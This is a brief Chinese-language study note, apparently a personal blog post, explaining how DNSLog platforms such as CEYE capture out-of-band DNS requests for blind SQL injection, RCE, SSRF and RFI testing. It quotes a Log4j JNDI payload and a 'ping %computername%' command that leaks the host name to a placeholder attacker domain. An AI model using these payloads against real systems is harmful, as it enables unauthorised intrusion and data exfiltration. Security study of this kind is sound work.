[NOTE] 关于DNSLog平台的使用
前言
起因是12.09午夜的Log4j核弹级漏洞
大家验证漏洞的payload:${jndi:idap://XXXX.dnslog.cn/aa}
发现大家用的都是DNSLog,而自己还不太懂这个
于是发现自己还是真的菜
就赶紧补一波
所以说什么时候自己租个服务器
DNSLog Platform
现如今的DNS解析一般是一个递归+迭代解析的过程:
粉->蓝->黄->绿->红
其中我们可以自己建立一个红色的服务器,接收记录每次的DNS请求
可以在一些在线的DNSLog平台申请一个域名,作为临时的DNS服务器
受害者查询的这个域名解析请求,会被该DNS服务器记录下
攻击者就可以结合其他字段形成payload,来进行渗透测试
主要针对无回显、盲注的情况
-
SQL盲注
-
RCE
-
SSRF
-
RFI (Remote File Inclusion)
相当于是提供一个回显的地方
实例
以CEYE为例
在CEYE已经申请到了一个子域名:XXXXX.ceye.io
这个就相当于是一个攻击者的DNS服务器了
然后任何关于*.XXXXX.ceye.io\*
的解析请求都会被记录
于是简单一下,尝试:ping whoami.XXXXX.ceye.io
结合其他字段形成payload:ping %computername%.XXXXX.ceye.io
大概就这样吧
CEYE除了DNS服务器之外,还有HTTP服务器
最后记下Windows和Linux的一些常用系统变量
另起笔记,在这里